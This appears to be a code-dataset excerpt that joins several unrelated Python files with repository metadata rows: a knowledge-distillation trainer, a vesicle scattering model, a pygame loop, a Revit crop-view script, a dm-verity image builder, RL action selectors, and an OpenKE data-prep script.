        """Run data-free distillation for max_iter - start_iter steps.

        :param optim_s: optimizer for the student network.
        :param optim_g: optimizer for the generator network.
        :param device: torch device; auto-selects CUDA when available.
        """
        if device is None:
            device = torch.device( 'cuda' if torch.cuda.is_available() else 'cpu' )
        self.device = device
        self.optim_s, self.optim_g = optim_s, optim_g
        self.model.to(self.device)
        self.teacher.to(self.device)
        self.generator.to(self.device)
        # dummy loader: data is generated on the fly, but the base trainer
        # expects an iterable train_loader to exist
        self.train_loader = [0, ]
        with set_mode(self.student, training=True), \
             set_mode(self.teacher, training=False), \
             set_mode(self.generator, training=True):
            super( ZSKTDistiller, self ).train( start_iter, max_iter )
    def search_optimizer(self, evaluator, train_loader, hpo_space=None, mode='min', max_evals=20, max_iters=400):
        # NOTE(review): `hpo` is not defined/imported in this module — calling
        # this method raises NameError; confirm the intended hpo dependency.
        optimizer = hpo.search_optimizer(self, train_loader, evaluator=evaluator, hpo_space=hpo_space, mode=mode, max_evals=max_evals, max_iters=max_iters)
        return optimizer
    def step(self):
        """One distillation step: 1 generator update, then 10 student updates."""
        start_time = time.perf_counter()
        # Adv: generator maximizes student/teacher KL divergence
        z = torch.randn( self.z_dim ).to(self.device)
        fake = self.generator( z )
        self.optim_g.zero_grad()
        t_out = self.teacher( fake )
        s_out = self.student( fake )
        loss_g = -kldiv( s_out, t_out )
        loss_g.backward()
        self.optim_g.step()
        # regenerate the fake batch (generator weights just changed) and
        # freeze the teacher targets for the student updates below
        with torch.no_grad():
            fake = self.generator( z )
            t_out = self.teacher( fake.detach() )
        # student takes several steps per generator step (10, per the paper)
        for _ in range(10):
            self.optim_s.zero_grad()
            s_out = self.student( fake.detach() )
            loss_s = kldiv( s_out, t_out )
            loss_s.backward()
            self.optim_s.step()
        loss_dict = {
            'loss_g': loss_g,
            'loss_s': loss_s,
        }
        step_time = time.perf_counter() - start_time
        # record training info
        info = loss_dict
        info['step_time'] = step_time
        info['lr_s'] = float( self.optim_s.param_groups[0]['lr'] )
        info['lr_g'] = float( self.optim_g.param_groups[0]['lr'] )
        self.history.put_scalars( **info )
    def reset(self):
        # NOTE(review): `train_loader` is undefined here (probably should be
        # self.train_loader), and self.start_iter is only set by the base
        # trainer — verify before relying on reset().
        self.history = None
        self._train_loader_iter = iter(train_loader)
        self.iter = self.start_iter
| 35.28 | 155 | 0.604592 | 2,681 | 0.759921 | 0 | 0 | 0 | 0 | 0 | 0 | 752 | 0.213152 |
2ba7784bc827b850acbbb011ada9ad1f701f4989 | 11,442 | py | Python | crease_ga/shapes/vesicle/scatterer_generator.py | arthijayaraman-lab/crease-ga | e757811d73687b3cd1df2d40d607a37116a20a7d | [
"MIT"
] | null | null | null | crease_ga/shapes/vesicle/scatterer_generator.py | arthijayaraman-lab/crease-ga | e757811d73687b3cd1df2d40d607a37116a20a7d | [
"MIT"
] | 6 | 2021-07-27T16:26:35.000Z | 2022-03-14T19:47:01.000Z | crease_ga/shapes/vesicle/scatterer_generator.py | arthijayaraman-lab/crease_ga | e757811d73687b3cd1df2d40d607a37116a20a7d | [
"MIT"
] | 2 | 2021-07-20T18:04:32.000Z | 2021-07-20T18:10:27.000Z | import numpy as np
import random
import numexpr as ne
def gen_layer(rin, rout, nsize):
    """Sample ``nsize`` points uniformly within the spherical shell rin..rout.

    Uniformity in volume is obtained by drawing the cubed radius uniformly
    and the direction isotropically (uniform azimuth, uniform cos of the
    polar angle).

    :param rin: inner shell radius.
    :param rout: outer shell radius.
    :param nsize: number of points to draw.
    :return: tuple of numpy arrays (x, y, z).
    """
    azimuth = np.random.uniform(0, 2 * np.pi, size=(nsize))
    cos_polar = np.random.uniform(-1, 1, size=(nsize))
    radius_cubed = np.random.uniform(rin**3, rout**3, size=(nsize))

    polar = np.arccos(cos_polar)
    radius = np.cbrt(radius_cubed)
    sin_polar = np.sin(polar)

    x = radius * sin_polar * np.cos(azimuth)
    y = radius * sin_polar * np.sin(azimuth)
    z = radius * np.cos(polar)
    return (x, y, z)
def LPFbead(qrange, sigmabead):
    '''
    Compute the spherical form factor given a range of q values.

    F(q) = 3 * (sin(QR) - QR*cos(QR)) / QR^3 with QR = q * sigmabead / 2.
    The q == 0 limit is handled explicitly (F -> 1) instead of producing a
    0/0 NaN as the previous implementation did.

    Parameters
    ----------
    qrange: numpy.array
        array of values in q-space to compute form factor for.
    sigmabead: float
        diameter of the sphere.

    Return
    -------
    Fqb: numpy.array
        array of values of the spherical form factors (F(q)) computed at
        q-points listed in qrange.
    '''
    R = np.true_divide(sigmabead, 2)
    QR = np.asarray(qrange, dtype=float) * R
    Fqb = np.ones_like(QR)          # lim_{QR->0} F(QR) = 1
    nonzero = QR != 0
    qr = QR[nonzero]
    Fqb[nonzero] = 3.0 * (np.sin(qr) - qr * np.cos(qr)) / qr**3
    return Fqb
def LPOmega(qrange, nAin, nAout, nB, r): # qvalues number_of_B number_of_A scatterer_coordinates
    """Intra-structure interference term omega(q) via the Debye formula.

    Sums sin(q*rij)/(q*rij) over all unique scatterer pairs in ``r``
    (shape (1, 3, Ntot)); numexpr (ne) accelerates the inner evaluation.
    Returns an array of shape (1, len(qrange)) normalized per scatterer.
    """
    Ntot=nAin+nB+nAout # Total number of scatterers to loop through
    omegaarrt=np.zeros((1,len(qrange))) # initiating array
    omegaarr=np.zeros((1,len(qrange))) # initiating array
    rur=r[0,:,:]# selects the single replicate's (3, Ntot) coordinates
    rur=rur.transpose()
    for i in range(Ntot-1): # loops through index and all further indexes to prevent double counting
        all_disp = rur[i,:]-rur[(i+1):,:]
        rij = np.sqrt(np.sum(np.square(all_disp),axis=1))
        rij = rij.transpose()
        rs = rij[:,np.newaxis] # reshapes array for consistency
        Q = qrange[np.newaxis,:] # reshapes array for consistency
        vals = ne.evaluate("sin(Q*rs)/(Q*rs)") # ne is efficient at calculations
        inds=np.argwhere(np.isnan(vals)) # error catching in case there are NaN values (rij == 0 overlaps)
        if len(inds)>0:
            for val in inds:
                # sinc limit: sin(x)/x -> 1 as x -> 0
                vals[val[0],val[1]]=1
        inds_double_check=np.argwhere(np.isnan(vals))
        if len(inds_double_check)>0:
            print('nan error!')
        vals = ne.evaluate("sum((vals), axis=0)") # adds together scatterer contributions for each q value
        omegaarr+=vals
    omegaarr=np.true_divide(2*omegaarr,Ntot)+1 # 1 accounts for the guarenteed overlap of same bead # 2* accounts for double counting avoided to reduce computational expense by looping for all other pairs
    omegaarrt+=omegaarr # stores values between loops
    return omegaarrt
def visualize(r, Rcore, dR_Ain, dR_B, dR_Aout, sigmabead):
    """Render the scatterer configuration as spheres with py3Dmol.

    Scatterers inside the B (solvophobic) shell are drawn red; everything
    else (the inner/outer A layers) is blue.  Requires py3Dmol (optional,
    imported lazily so the rest of the module works without it).

    :param r: coordinates array of shape (1, 3, Ntot) from genLP.
    :return: the py3Dmol view object.
    """
    import py3Dmol
    view = py3Dmol.view()
    for ri in r[0,:,:].transpose():
        # radial distance decides the layer (and hence the color)
        if np.linalg.norm(ri) < Rcore+dR_Ain or np.linalg.norm(ri) > (Rcore+dR_Ain+dR_B):
            col = 'blue'
        else:
            col = 'red'
        view.addSphere(
            {
                'center': {'x': ri[0], 'y': ri[1], 'z': ri[2]},
                'radius': sigmabead/2,
                'color': col,
                'alpha': 0.9,
            }
        )
    #view.zoomTo()
    view.show()
    return view
def genLP(Rcore, dR_Ain, dR_B, dR_Aout, sigmabead, nAin, nAout, nB):
    """Generate scatterer coordinates for one vesicle configuration.

    Layers are filled in order: inner A shell [Rcore, Rcore+dR_Ain),
    B shell, then outer A shell, each sampled uniformly via gen_layer.
    (Removed a dead `types` array that was never returned, an unused
    `power` constant, and a single-iteration wrapper loop.)

    :param sigmabead: bead diameter (kept for interface compatibility;
                      not used in coordinate generation).
    :return: numpy array of shape (1, 3, nAin + nB + nAout).
    """
    ntot = nAin + nB + nAout
    r = np.zeros((1, 3, ntot))

    ### Populate A inner Layer: indices [0, nAin) ###
    x, y, z = gen_layer(Rcore, Rcore + dR_Ain, nAin)
    r[0, 0, :nAin], r[0, 1, :nAin], r[0, 2, :nAin] = x, y, z

    ### Populate B middle Layer: indices [nAin, nAin + nB) ###
    x, y, z = gen_layer(Rcore + dR_Ain, Rcore + dR_Ain + dR_B, nB)
    r[0, 0, nAin:nAin + nB], r[0, 1, nAin:nAin + nB], r[0, 2, nAin:nAin + nB] = x, y, z

    ### Populate A outer Layer: indices [nAin + nB, ntot) ###
    x, y, z = gen_layer(Rcore + dR_Ain + dR_B, Rcore + dR_Ain + dR_B + dR_Aout, nAout)
    r[0, 0, nAin + nB:], r[0, 1, nAin + nB:], r[0, 2, nAin + nB:] = x, y, z

    return r
class scatterer_generator:
    '''
    The wrapper class for vesicle shape. Default length unit: Angstrom.
    Notes
    -----
    **The following 7 shape-specific descriptors are to be specified by user (see
    *Attributes*) as
    a list, in the precise order as listed, while calling `Model.load_shape`
    to load this shape:**
    num_scatterers:
        Number of scatterers used to represent a chain. Default: 24
    N:
        Number of monomers in a chain. Default: 54
    eta_B:
        Packing fraction of scatterers in B layer. Default: 0.5
    lmono_b:
        Diameter of a monomer of chemistry B. Default: 50.4 A
    lmono_a:
        Diameter of a monomer of chemistry A. Default: 50.4 A
    fb:
        Fraction of monomers in chain that are of B type. fa = 1-fb. Default: 0.55
    nLP:
        Number of replicates for each individual. Default: 7
    **The following 7 parameters are to be predicted, in the precise order
    as listed, by GA:**
    R_core:
        Core radius. Default [min,max]: [50 A, 400 A]
    t_Ain:
        Thickness of inner A layer. Default [min,max]: [30 A, 200 A]
    t_B:
        Thickness of B layer. Default [min,max]: [30 A, 200 A]
    t_Aout:
        Thickness of outer A layer. Default [min,max]: [30 A, 200 A]
    sigma_Ain:
        Split of solvophilic scatterers between inner and outer layers.
        Default [min,max]: [0.1, 0.45]
    sigma_R:
        Dispersity in vesicle size as implemented in the core radius.
        Default [min,max]: [0.0, 0.45]
    log10(bg):
        Negative log10 of background intensity.
        E.g. an background intensity of 0.001 leads to this value being 3.
        Default [min,max]: [0.1,4]
    See also
    --------
    crease_ga.Model.load_shape
    '''
    # NOTE(review): shape_params uses a mutable (list) default; harmless here
    # since it is only read, but a tuple default would be safer.
    def __init__(self,
                 shape_params = [24,54,0.5,50.4,50.4,0.55,7],
                 minvalu = (50, 30, 30, 30, 0.1, 0.0, 0.1),
                 maxvalu = (400, 200, 200, 200, 0.45, 0.45, 4)):
        num_scatterers = shape_params[0]
        N = shape_params[1]
        rho_B = shape_params[2]
        lmono_a = shape_params[3]
        lmono_b= shape_params[4]
        fb = shape_params[5]
        nLP = shape_params[6]
        self._numvars = 7
        self.minvalu = minvalu
        self.maxvalu = maxvalu
        self.num_scatterers=num_scatterers ## number of scatterers per chain
        self.N=N ## Number of beads on chain
        self.rho_B=rho_B ## density/volume fraction of beads in B layer
        self.lmono_a=lmono_a ## Angstrom 'monomer contour length'
        self.lmono_b=lmono_b ## Angstrom 'monomer contour length'
        self.MB=np.pi/6*(self.lmono_b)**3 ## volume of B monomer
        self.sigmabead=np.true_divide(self.N*self.lmono_b,self.num_scatterers) ## scatterer bead diameter
        self.fb=fb ## fraction of B type monomers in chain
        self.nLP=nLP ## number of replicates
    @property
    def numvars(self):
        # number of GA-predicted parameters (fixed at 7 for this shape)
        return self._numvars
    def converttoIQ(self, qrange, param):
        '''
        Calculate computed scattering intensity profile.
        Parameters
        ----------
        qrange: numpy.array
            q values.
        param: numpy.array
            Decoded input parameters. See *Notes* section of the class
            documentation.
        Returns
        -------
        IQid: A numpy array holding I(q), normalized to max 1 plus background.
        '''
        # q values, decoded parameters,
        # number of repeat units per chain, fraction of B beads per chain, core density,
        # scatterer diameter, molar mass of B chemistry,
        # length of A chemistry bond, length of B chemistry bond,
        # number of scatterers per chain, # of replicates, stdev in Rcore size
        sigmabead = self.sigmabead
        N = self.N
        fb = self.fb
        rho_B = self.rho_B
        MB = self.MB
        lmono_a = self.lmono_a
        lmono_b = self.lmono_b
        num_scatterers = self.num_scatterers
        nLP = self.nLP
        IQid=np.zeros((len(qrange))) #initiates array for output IQ
        ### Parameters used to generate scatterer placements ###
        Rcore=param[0]
        dR_Ain=param[1]
        dR_B=param[2]
        dR_Aout=param[3]
        sAin=param[4] # split of type A scatterer
        sigmaR=param[5] # variation in Rcore, dispersity
        #print(Rcore, dR_Ain, dR_B, dR_Aout, sAin)
        Background=10**(-param[6])
        varR = Rcore*sigmaR # variation in Rcore
        disper = np.array([-2.0, -1.5, -1.0, -0.5, 0.0, 0.5, 1.0, 1.5, 2.0]) # fixed intervals of sigma
        sum_omegaarr=np.zeros((1,len(qrange)))
        # average over nLP size-dispersed replicates, centered on disper's middle
        for step in range(0, nLP):
            Rcore = param[0] + varR*disper[step + int((9-nLP)/2.)] ## add displacement to Rcore
            # print("disper = ", disper[step + int((9-nLP)/2.)])
            # print("Rcore = ", Rcore)
            vol_B = (4/3.0)*np.pi*(np.power(Rcore + dR_Ain + dR_B, 3)
                                   - np.power(Rcore + dR_Ain, 3)) ## volume of solvophobic layer B
            nagg = int(np.true_divide( rho_B*vol_B, N*fb*MB )) ## number of chains in vesicle
            ntot = nagg*num_scatterers ## total number of scatterers
            nB = int(ntot*fb) ## number of scatterers in B
            nAin = int(ntot*(1-fb)*sAin) ## number of scatterers in A_in
            nAout = int(ntot*(1-fb)*(1-sAin)) ## number of scatterers in A_out
            # 3 independent placements per replicate to reduce sampling noise
            for reps in range(0, 3):
                ### Generates scatterer positions in structure ###
                r = genLP(Rcore, dR_Ain, dR_B, dR_Aout, sigmabead, nAin, nAout, nB)
                ### Calculates omega from scatterers in shape ###
                sum_omegaarr += LPOmega(qrange, nAin, nAout, nB, r)
        omegaarr=np.true_divide(sum_omegaarr,nLP*3) # average omega
        omegaarr=omegaarr.reshape(len(qrange),)
        Fqb=LPFbead(qrange,sigmabead) # calcualtes sphere shape factor
        F2qb=np.multiply(Fqb,Fqb) # Sphere shape factor square
        sqmm=np.ones((np.shape(Fqb))) # assuming dilute mixture the micelle-micelle structure factor = 1
        F2qb_sqmm=np.multiply(F2qb,sqmm) # determines the micelle form factor
        IQid=np.multiply(omegaarr,F2qb_sqmm) # calculates Icomp
        maxIQ=np.max(IQid)
        IQid=np.true_divide(IQid,maxIQ) # normalizes the I(q) to have its maximum = 1
        IQid+=Background # add background
        return IQid
| 39.184932 | 210 | 0.549205 | 6,800 | 0.594302 | 0 | 0 | 61 | 0.005331 | 0 | 0 | 5,001 | 0.437074 |
2ba7860171b35ef1fd22e6ca196a4bf0cdd6ce68 | 841 | py | Python | main.py | fmiju/fssg3 | ffda53e9e65a9ecd22c853e80a0af0226a4b22e4 | [
"BSD-3-Clause"
] | null | null | null | main.py | fmiju/fssg3 | ffda53e9e65a9ecd22c853e80a0af0226a4b22e4 | [
"BSD-3-Clause"
] | null | null | null | main.py | fmiju/fssg3 | ffda53e9e65a9ecd22c853e80a0af0226a4b22e4 | [
"BSD-3-Clause"
] | null | null | null | import pygame
from pygame.locals import *
# Simple state-machine game loop (Python 2: uses print statements).
# States: 0 idle -> 1 build ship -> 2 shoot -> 3 dead -> (0 restart | 4 quit)
gameState = 0
pygame.init()
while 1:
#    print "state: ", gameState
    # idle
    if gameState == 0:
        # NOTE(review): this print drains the event queue, so the loop below
        # reads a second (likely empty) batch — the SPACE press may be lost.
        print pygame.event.get()
        for event in pygame.event.get():
            if (event.type == KEYDOWN and event.key == K_SPACE):
                gameState = 1
    # build ship
    elif gameState == 1:
        for event in pygame.event.get():
            if (event.type == KEYDOWN and event.key == K_1):
                gameState = 2
    # shoot
    elif gameState == 2:
        for event in pygame.event.get():
            if (event.type == KEYDOWN and event.key == K_2):
                gameState = 3
    # dead: 'r' restarts, 'q' quits
    elif gameState == 3:
        for event in pygame.event.get():
            if (event.type == KEYDOWN and event.key == K_r):
                gameState = 0
            elif (event.type == KEYDOWN and event.key == K_q):
                gameState = 4
    # quit
    # NOTE(review): state 4 only prints; the loop never breaks or exits.
    elif gameState == 4:
        print "quitting"
    else:
        print 'meow'
| 21.025 | 55 | 0.630202 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 81 | 0.096314 |
2bad3c5762b8c994d171a46e6e014d25fb8793f4 | 4,974 | py | Python | BikeAndBim.extension/BikeAnd.tab/View.panel/Edit_crop.pushbutton/script.py | appolimp/Revit_extensions_pyRevit | 1790b18c12e8bc603a6a726b2733678494180986 | [
"MIT"
] | 4 | 2021-02-04T06:24:27.000Z | 2022-01-29T20:24:22.000Z | BikeAndBim.extension/BikeAnd.tab/View.panel/Edit_crop.pushbutton/script.py | appolimp/Revit_extensions_pyRevit | 1790b18c12e8bc603a6a726b2733678494180986 | [
"MIT"
] | null | null | null | BikeAndBim.extension/BikeAnd.tab/View.panel/Edit_crop.pushbutton/script.py | appolimp/Revit_extensions_pyRevit | 1790b18c12e8bc603a6a726b2733678494180986 | [
"MIT"
] | null | null | null | # coding=utf-8
from rpw import db, DB, UI, uidoc, doc, logger
def task_dialog(msg):
    """
    Show a Revit task dialog reporting an error.

    :param msg: Message for window
    :type msg: str
    """
    dialog = UI.TaskDialog('Edit crop')
    dialog.TitleAutoPrefix = False
    dialog.MainIcon = UI.TaskDialogIcon.TaskDialogIconError
    dialog.MainInstruction = 'Error'
    dialog.MainContent = msg
    dialog.CommonButtons = UI.TaskDialogCommonButtons.Ok
    dialog.Show()
def box_selection():
    """
    Ask the user to drag a rectangle and return its corner points.

    :returns (DB.XYZ, DB.XYZ)
    :rtype tuple
    """
    pick_result = uidoc.Selection.PickBox(
        UI.Selection.PickBoxStyle.Enclosing, 'select two point')
    return pick_result.Min, pick_result.Max
@db.Transaction.ensure('Edit crop view')
def set_view_crop_by_point(view, down_left, up_right):
    """
    Set the crop region of ``view`` from min and max points, keeping the
    crop box's existing Z extents.

    :param view: DB.View
    :param down_left: DB.XYZ
    :param up_right: DB.XYZ
    """
    box = view.CropBox
    box.Min = down_left + box.Min.Z * DB.XYZ.BasisZ
    box.Max = up_right + box.Max.Z * DB.XYZ.BasisZ
    # write the box back to the SAME view it was read from; the original
    # assigned to doc.ActiveView.CropBox, which silently modified the wrong
    # view whenever `view` was not the active one
    view.CropBox = box
def calc_x_y_plan(view, point):
    """
    Project a model point into the plane of a plan view.

    - shift by the view origin and drop the Z component
    - rotate by the angle between view.UpDirection and DB.XYZ.BasisY

    :param view: DB.ViewPlan
    :param point: DB.XYZ
    :return: DB.XYZ in plane view
    """
    offset = point - view.Origin
    in_plane = offset - offset.Z * DB.XYZ.BasisZ
    rotation = calc_angle(view.UpDirection, DB.XYZ.BasisY)
    return rotate_by_point_and_angle(in_plane, DB.XYZ.Zero, rotation)
def calc_angle(main_vector, second_vector):
    """
    Signed angle between two vectors; sign comes from the Z component of
    their cross product.

    :param main_vector: DB.XYZ
    :param second_vector: DB.XYZ
    :return: Angle with sign
    :rtype: float
    """
    magnitude = main_vector.AngleTo(second_vector)
    if main_vector.CrossProduct(second_vector).Z >= 0:
        return magnitude
    return -magnitude
def rotate_by_point_and_angle(vector, origin, angle):
    """
    Rotate a point about the Z axis passing through ``origin``.

    :param vector: DB.XYZ
    :param origin: DB.XYZ of origin
    :param angle: Angle to rotate
    :type angle: float
    :return: DB.XYZ
    """
    rotation = DB.Transform.CreateRotationAtPoint(DB.XYZ.BasisZ, angle, origin)
    return rotation.OfPoint(vector)
def calc_x_y_section(view, point):
    """
    Project a model point into the plane of a section view.

    - shift by the view origin
    - horizontal coordinate is the signed in-plane distance (sign from the
      Z of ViewDirection x offset), vertical coordinate is the Z offset

    :param view: DB.ViewSection
    :param point: DB.XYZ
    :return: DB.XYZ in plane view
    """
    offset = point - view.Origin
    height = offset.Z
    in_plane = offset - height * DB.XYZ.BasisZ
    if view.ViewDirection.CrossProduct(in_plane).Z >= 0:
        horizontal = in_plane.GetLength()
    else:
        horizontal = -in_plane.GetLength()
    return DB.XYZ(horizontal, height, 0)
def calc_up_down(p_first, p_second):
    """
    Order two points into (lower-left, upper-right) corners at Z == 0.

    :param p_first: DB.XYZ
    :param p_second: DB.XYZ
    :return: (DB.XYZ, DB.XYZ)
    :rtype: tuple
    """
    xs = (p_first.X, p_second.X)
    ys = (p_first.Y, p_second.Y)
    lower_left = DB.XYZ(min(xs), min(ys), 0)
    upper_right = DB.XYZ(max(xs), max(ys), 0)
    return lower_left, upper_right
def calc_point_by_handler(view, first, second, handler):
    """
    Turn two picked model points into crop-box corners for ``view``.

    - project each point into the view plane via ``handler``
    - order the results as (down_left, up_right)

    :param view: DB.View
    :param first: DB.XYZ
    :param second: DB.XYZ
    :param handler: Func for transform point for view
    :type handler: lambda view, point: pass
    :return: (DB.XYZ, DB.XYZ)
    :rtype: tuple
    """
    projected_first = handler(view, first)
    projected_second = handler(view, second)
    return calc_up_down(projected_first, projected_second)
def edit_crop(view):
    """
    Crop ``view`` to a rectangle drawn by the user.

    :param view: DB.View (plan or section type)
    :raises NotImplementedError: for unsupported view types
    """
    # guard clause: bail out early for view types we cannot project
    if view.ViewType not in VALID_VIEW_TYPE:
        raise NotImplementedError('View type "{}" not designed'.format(doc.ActiveView.ViewType))
    handler = VALID_VIEW_TYPE[view.ViewType]
    corner_a, corner_b = box_selection()
    p_min, p_max = calc_point_by_handler(view, corner_a, corner_b, handler)
    set_view_crop_by_point(view, p_min, p_max)
# Supported view types mapped to the projection function that converts a
# picked model point into that view's crop plane.
VALID_VIEW_TYPE = {
    DB.ViewType.Section: calc_x_y_section,
    DB.ViewType.Elevation: calc_x_y_section,
    DB.ViewType.EngineeringPlan: calc_x_y_plan,
    DB.ViewType.FloorPlan: calc_x_y_plan,
}
def main():
    # crop the currently active view to a user-drawn rectangle
    view = doc.ActiveView
    edit_crop(view)
if __name__ == '__main__':
    # 50 == logging.CRITICAL: hide rpw debug chatter from end users
    logger.setLevel(50)
    try:
        main()
    except Exception as err:
        # str(err) is safe even for exceptions raised with no args, unlike
        # the previous err.args[0], which itself raised IndexError then
        task_dialog(msg=str(err) + '\nPlease, write Nikita')
| 23.242991 | 96 | 0.65581 | 0 | 0 | 0 | 0 | 403 | 0.081021 | 0 | 0 | 1,955 | 0.393044 |
2bad9543f61fe85bae0ab93637dfc67e43dc0ae6 | 1,876 | py | Python | dm_verity_make_ext4fs.py | bigb123/samsung-android_bootable_recovery_libdmverity | 2f9ce00f76ed4f1a251d5244ae2533cf53417478 | [
"MIT"
] | 1 | 2020-06-28T00:49:21.000Z | 2020-06-28T00:49:21.000Z | dm_verity_make_ext4fs.py | bigb123/samsung-android_bootable_recovery_libdmverity | 2f9ce00f76ed4f1a251d5244ae2533cf53417478 | [
"MIT"
] | null | null | null | dm_verity_make_ext4fs.py | bigb123/samsung-android_bootable_recovery_libdmverity | 2f9ce00f76ed4f1a251d5244ae2533cf53417478 | [
"MIT"
] | 1 | 2021-03-05T16:54:52.000Z | 2021-03-05T16:54:52.000Z | #! /usr/bin/env python
# make_ext4fs -s -S /home/swei/p4/STA-ESG_SWEI_KLTE_ATT-TRUNK_DMV/android/out/target/product/klteatt/root/file_contexts -l 2654994432 -a system system.img.ext4 system
import os,posixpath,sys,getopt
reserve=1024*1024*32
def run(cmd):
    # echo the command for logging, then execute it via the shell;
    # returns the os.system() exit status (0 on success)
    print cmd
#    return 0
    return os.system(cmd)
def main():
    """Build a sparse ext4 image and append dm-verity metadata (Python 2).

    Parses make_ext4fs-style options, shrinks the requested length by
    `reserve` bytes to leave room for the verity tree, runs make_ext4fs,
    then img_dm_verity, and finally moves the result into place.
    Returns 0 on success, -1 on any failure.
    """
    d = posixpath.dirname(sys.argv[0])
    make_ext4fs_opt_list = []
    optlist, args = getopt.getopt(sys.argv[1:], 'l:j:b:g:i:I:L:a:G:fwzJsctrvS:X:')
    if len(args) < 1:
        print 'image file not specified'
        return -1;
    image_file = args[0]
    length = None
    sparse = False
    for o, a in optlist:
        if '-l' == o:
            # reserve space for the dm-verity hash tree at the end
            length = int(a)
            make_ext4fs_opt_list.append(o)
            make_ext4fs_opt_list.append(str(length-reserve))
        elif '-s' == o:
            sparse = True
            make_ext4fs_opt_list.append(o)
        else:
            # pass every other option (and its value, if any) straight through
            make_ext4fs_opt_list.append(o)
            if len(a) > 0:
                make_ext4fs_opt_list.append(a)
    if not sparse:
        print 'we can only handle sparse image format for server generated dmverity for now'
        return -1
    if None == length:
        print 'size of system image not taken'
        return -1
    make_ext4fs_opt_list.extend(args)
    # step 1: build the (shrunk) sparse ext4 image
    cmd = os.path.join(d, 'make_ext4fs') + ' ' +' '.join(make_ext4fs_opt_list)
    if(0 != run(cmd)):
        print 'failed!'
        return -1;
    # step 2: append the dm-verity metadata for the SYSTEM partition
    cmd = ' '.join(['img_dm_verity', '/dev/block/platform/15540000.dwmmc0/by-name/SYSTEM', str(length), image_file, image_file+'.tmp'])
    if(0 != run(cmd)):
        print 'failed!'
        return -1;
    # step 3: replace the original image with the verity-enabled one
    cmd = ' '.join(['mv', image_file+'.tmp', image_file])
    if(0 != run(cmd)):
        print 'failed!'
        return -1;
    return 0
#return os.system(cmd)
if __name__ == "__main__":
ret = main()
sys.exit(ret)
| 28.861538 | 166 | 0.587953 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 545 | 0.290512 |
2baea66c9dda1164b219c75b1a324b8723e5a8b9 | 2,787 | py | Python | rl/policies/action_selection_strategy.py | Sen-R/reinforcement-learning | 493788132f991d294b425cbf34c5673fbd18c8dd | [
"MIT"
] | null | null | null | rl/policies/action_selection_strategy.py | Sen-R/reinforcement-learning | 493788132f991d294b425cbf34c5673fbd18c8dd | [
"MIT"
] | null | null | null | rl/policies/action_selection_strategy.py | Sen-R/reinforcement-learning | 493788132f991d294b425cbf34c5673fbd18c8dd | [
"MIT"
] | null | null | null | """Strategies for selecting actions for value-based policies."""
from abc import ABC, abstractmethod
from typing import List, Optional
from numpy.typing import ArrayLike
import numpy as np
from rl.action_selectors import (
ActionSelector,
DeterministicActionSelector,
UniformDiscreteActionSelector,
NoisyActionSelector,
)
class ActionSelectionStrategy(ABC):
"""Base class for action selection strategies."""
@abstractmethod
def __call__(
self,
action_values: List[float],
action_counts: List[int],
) -> ActionSelector:
pass
class EpsilonGreedy(ActionSelectionStrategy):
    """Epsilon-greedy action selection.

    With probability ``epsilon`` a uniformly random action is explored;
    otherwise the action with the highest estimated value is exploited.

    Args:
        epsilon: probability of exploring instead of exploiting.
        random_state: ``None``, ``int`` or ``np.random.Generator`` used to
            seed the internal RNG.
    """

    def __init__(self, epsilon: float = 0.0, random_state=None):
        self._rng = np.random.default_rng(random_state)
        self.epsilon = epsilon

    def __call__(
        self,
        action_values: List[float],
        action_counts: Optional[List[int]] = None,
    ) -> NoisyActionSelector:
        """Build the selector; ``action_counts`` is ignored by this strategy."""
        n_actions = len(action_values)
        best = int(np.argmax(action_values))
        exploit = DeterministicActionSelector(best)
        explore = UniformDiscreteActionSelector(n_actions, random_state=self._rng)
        return NoisyActionSelector(
            self.epsilon, exploit, explore, random_state=self._rng
        )
class UCB(ActionSelectionStrategy):
    """Upper-confidence-bound (UCB) action selection.

    Follows Sutton & Barto, eq. 2.10, except that action counts are floored
    at ``eps`` so never-tried actions do not cause a division by zero.  The
    time step ``t`` is recovered as ``sum(action_counts) + 1``, i.e. the step
    at which the next action is being chosen.

    Args:
        c: confidence (exploration) coefficient.
        eps: small positive floor applied to zero counts.
    """

    def __init__(self, c: float, eps: float = 1.0e-8):
        self.c = c
        self._eps = eps

    def __call__(
        self,
        action_values: List[float],
        action_counts: List[int],
    ) -> DeterministicActionSelector:
        scores = self.ucb(action_values, action_counts)
        return DeterministicActionSelector(int(np.argmax(scores)))

    def ucb(
        self,
        action_values: List[float],
        action_counts: List[int],
    ) -> ArrayLike:
        """Return the per-action UCB scores as an array."""
        floored_counts = np.maximum(action_counts, self._eps)
        bonus = np.sqrt(np.log(np.sum(action_counts) + 1) / floored_counts)
        return action_values + self.c * bonus
| 30.626374 | 78 | 0.670972 | 2,439 | 0.875135 | 0 | 0 | 155 | 0.055615 | 0 | 0 | 879 | 0.315393 |
2baeca8d8ff61c43fa93b0a9c182df48e8c05900 | 8,543 | py | Python | create_data_for_openke.py | nhutnamhcmus/KGC-Benchmark-Datasets | febed9fcc8c715c4dbdbce89a5355f7387c4c6ce | [
"Apache-2.0"
] | null | null | null | create_data_for_openke.py | nhutnamhcmus/KGC-Benchmark-Datasets | febed9fcc8c715c4dbdbce89a5355f7387c4c6ce | [
"Apache-2.0"
] | null | null | null | create_data_for_openke.py | nhutnamhcmus/KGC-Benchmark-Datasets | febed9fcc8c715c4dbdbce89a5355f7387c4c6ce | [
"Apache-2.0"
] | 1 | 2022-02-20T03:29:07.000Z | 2022-02-20T03:29:07.000Z | import pandas as pd
import numpy as np
from argparse import ArgumentParser
parser = ArgumentParser("Python scirpt for OpenKE dataset initialization.")
parser.add_argument("--folder", default="WN18RR/",
help="Name of dataset folder.")
args = parser.parse_args()
print(args)
def getID(folder='FB122/'):
    """Assign integer ids to every entity and relation in a dataset.

    Reads ``train.txt``, ``valid.txt`` and ``test.txt`` from *folder* (one
    triple per line: ``head<TAB>relation<TAB>tail``), assigns ids in order of
    first appearance, mirrors each split into ``<split>_marked.txt`` and
    writes the ``entity2id.txt`` / ``relation2id.txt`` lookup files (first
    line is the entry count, then one ``label<TAB>id`` line per entry).

    Note: *folder* is concatenated directly with the file names, so it must
    end with a path separator.
    """
    lstEnts = {}
    lstRels = {}

    def _index_split(split):
        # Scan one split, register unseen entities/relations, and mirror the
        # triples into <split>_marked.txt.  (Replaces three duplicated loops.)
        count = 0
        with open(folder + split + '.txt') as src, \
                open(folder + split + '_marked.txt', 'w') as dst:
            for line in src:
                tokens = [tok.strip() for tok in line.strip().split()]
